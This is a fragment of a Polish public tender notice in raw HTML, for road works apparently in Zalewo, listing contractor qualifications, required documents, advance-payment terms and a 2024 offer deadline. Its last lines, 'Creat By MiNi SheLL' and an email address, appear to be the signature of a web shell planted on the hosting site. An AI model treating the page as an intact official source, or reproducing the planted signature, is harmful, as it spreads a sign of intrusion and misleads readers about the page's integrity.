KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:<br/>1) Nie podlegają wykluczeniu,<br/>2) Spełniają warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 ustawy pzp:<br/>2.1) w zakresie zdolności do występowania w obrocie gospodarczym - Zamawiający nie precyzuje w tym zakresie żadnych wymagań;<br/>2.2) w zakresie uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie precyzuje w tym zakresie żadnych wymagań;<br/>2.3) w zakresie sytuacji ekonomicznej lub finansowej - Zamawiający nie precyzuje w tym zakresie żadnych wymagań ;<br/>2.4) w zakresie zdolności technicznej lub zawodowej:<br/>a) Zamawiający wymaga aby Wykonawca skierował do realizacji przedmiotu zamówienia osobę:<br/>- Kierownik robót budowlanych, posiadający uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej do kierowania robotami budowlanymi lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w/w specjalności umożliwiające zrealizowanie przedmiotowego zamówienia ( zgodnie z<br/>zał. nr 6 do SWZ).<br/>W przypadku uprawnień budowlanych dla poszczególnych osób dopuszcza się odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im kwalifikacje zawodowe uprawniające do kierowania robotami budowlanymi w danej specjalności nabyte w państwach członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz w państwach Europejskiego Obszaru Gospodarczego, z zastrzeżeniem przepisu art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( tekst jednolity: Dz. U. z 2023 r. poz. 682 ) oraz przepisów ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jednolity: Dz. U. z 2023r., poz. 334 ). W tej sytuacji wykonawca na własny koszt zapewni tłumacza języka polskiego, który zapewni biegłe tłumaczenie w kontaktach pomiędzy Zamawiającym a Wykonawcą. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (jednolity tekst: Dz. U. z 2023 r. poz. 1689ze zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/><br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w Rozdz. XI ust. 4 pkt 1) lit. b SWZ, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości jego aktywami nie zarządza likwidator lub sąd, nie zawarł układ z wierzycielami, jego działalność gospodarcza nie jest zawieszona albo nie znajduje się<br/>on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Rozdz. XI ust. 4 pkt 1) lit. b SWZ, zastępuje się je w całości dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami - załącznik nr 6 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca wraz z formularzem oferty (sporządzonym wg załącznika nr 1 do SWZ) składa:<br/>1) oświadczenie Wykonawcy, o którym mowa w art. 125 ust.1 ustawy Pzp, o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do SWZ, w zakresie wskazanym przez Zamawiającego.<br/>2) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik. Pełnomocnictwo – jeżeli dotyczy - musi być załączone do oferty w oryginale w takiej samej formie jak składana oferta tj. w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub osobistym. Dopuszcza się także złożenie elektronicznej kopii pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym bądź też opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/>3) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – jeśli dotyczy - załącznik nr 4 do SWZ,<br/>4) w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, wykonawca składa także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby - zgodnie z załącznikiem nr 2a do SWZ,<br/>5) oświadczenie w przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego powinno wynikać, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy występujący wspólnie – jeśli dotyczy - załącznik nr 5 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w rozdz. XI ust.1 SWZ, składa każdy z wykonawców we własnym imieniu. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu ( zał. 2 do SWZ).<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika które usługi/roboty budowlane wykonają poszczególni wykonawcy (Zał. nr 5 do SWZ).<br/>3. W przypadku Wykonawców działających w formie spółki cywilnej:<br/>1) oświadczenie, o którym mowa w pkt 1 składane jest przez każdego wspólnika spółki cywilnej oddzielnie we własnym imieniu (osoby prowadzącej działalność gospodarczą pod nazwą określoną w centralnej ewidencji i informacji o działalności gospodarczej - „Firma przedsiębiorcy”),<br/>2) podmiotowe środki dowodowe, o których mowa w Rozdz. XI ust 4 SWZ składane jest przez każdego wspólnika spółki cywilnej oddzielnie we własnym imieniu (osoby prowadzącej działalność gospodarczą pod nazwą określoną w centralnej ewidencji i informacji o działalności gospodarczej - „Firma przedsiębiorcy”). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Inwestycja realizowana będzie w okresie nie dłuższym niż 12 miesięcy, dlatego też Zamawiający (zgodnie z zasadami Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych) przewiduje wypłatę zaliczki w wysokości nie mniejszej niż 5% wynagrodzenia wykonawcy, w terminie do 60 dni od dnia podpisania umowy. Pozostała cześć wynagrodzenia zostanie wypłacona po zakończeniu realizacji zamówienia. Szczegółowe zapisy dotyczące sposobu wypłaty zaliczki uregulowane zostały we wzorze umowy, stanowiącym zał. nr 7 do SWZ. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym we wzorze umowy, stanowiącym załącznik nr 7 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zalewo.logintrade.net/zapytania_email,158820,0451e7b613982eac0e948c7e64bea5b5.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-05 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com